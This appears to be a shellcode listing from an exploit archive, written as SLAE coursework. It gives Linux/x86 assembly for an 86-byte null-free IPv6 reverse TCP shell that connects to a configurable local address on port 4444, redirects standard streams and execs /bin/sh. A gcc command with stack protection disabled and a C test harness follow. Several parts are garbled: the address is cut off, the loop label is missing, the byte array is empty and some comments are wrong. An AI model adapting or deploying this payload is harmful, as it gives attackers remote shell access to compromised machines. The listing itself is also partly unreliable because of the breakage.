Linux/x86 Reverse TCP (::FFFF: Shell Shellcode

86 bytes small Linux/x86 reverse TCP (::FFFF: shell (/bin/sh) + null-free + IPv6 shellcode.

MD5 | 841854d50e743d5f6ad22336b8cda687

# Title: Linux/x86 - Reverse TCP shell (IPv6) + Null Free
# Shellcode Author: Kartik Durg
# Shellcode Length: 86 BYTES
# Student-ID: SLAE-1233
# Note ~
# Description: Connect-back to IPV6 socket listening on IP
::FFFF: and port 4444.


global _start
section .text


;IPV6 socket creation
;int socketcall(int call, unsigned long *args);
;sockfd = socket(int socket_family, int socket_type, int protocol);
push byte 0x66 ;socketcall()
pop eax ;EAX=0x2

xor ebx,ebx ;zero out ebx

push 0x6 ; IPPROTO_TCP=6
push 0x1 ; socket_type=SOCK_STREAM (0x1)
push 0xa ; AF_INET6
inc ebx ; Define SYS_socket = 1
mov ecx,esp ; save pointer (ESP) to socket() args (ECX)
int 0x80
xchg esi,eax ; sockfd stored in esi
xor eax,eax

;connect(sockfd, (struct sockaddr*)&srvaddr, sizeof(srvaddr));
;int socketcall(int call, unsigned long *args);
push DWORD eax ;sin6_scope_id
push DWORD 0x0501a8c0 ;MY LOCAL IP = | Can be configured to
push word 0xffff
push DWORD eax
push DWORD eax
push WORD ax ;inet_pton(AF_INET6, "::ffff:",
push DWORD eax ;sin6_flowinfo
push WORD 0x5c11 ;sin6_port=4444 | 0x5c11 | Configurable |
push WORD 0x0a ;AF_INET6
mov ecx,esp ;ECX holds pointer to struct
push byte 0x1c ;sizeof(sockaddr_in6) | sockaddr_in6
= 28
push ecx ;pointer to sockfd
push esi ;sockfd
mov ecx,esp ;ECX points to args
inc ebx
inc ebx ;EBX = 0x3 | #define
SYS_Connect 3
push byte 0x66 ;socketcall()
pop eax
int 80h

push byte 0x2 ;push 0x2 on stack
pop ecx ;ECX = 2

;dup2() to redirect stdin(0), stdout(1) and stderr(2)
push byte 0x3f ;dup2()
pop eax ;EAX = 0x3f
int 0x80 ;exec sys_dup2
dec ecx ;decrement counter
jns loop ;if SF not set ==> keep on jumping

xor ecx,ecx ;clear ECX
push ecx ;Push NULL
push byte 0x0b ;execve() sys call number
pop eax ;EAX=0x2 | execve()
push 0x68732f2f ;(1)/bin//sh
push 0x6e69622f ;(2)/bin//sh
mov ebx,esp ;EBX pointing to a/bin//sha
int 0x80 ;Calling Interrupt for sys call


gcc shellcode.c -o shellcode -fno-stack-protector -z execstack -m32




unsigned char shellcode[] = \

printf("Shellcode Length: %d\n", sizeof(shellcode) - 1);
int (*ret)() = (int(*)())shellcode;

Related Posts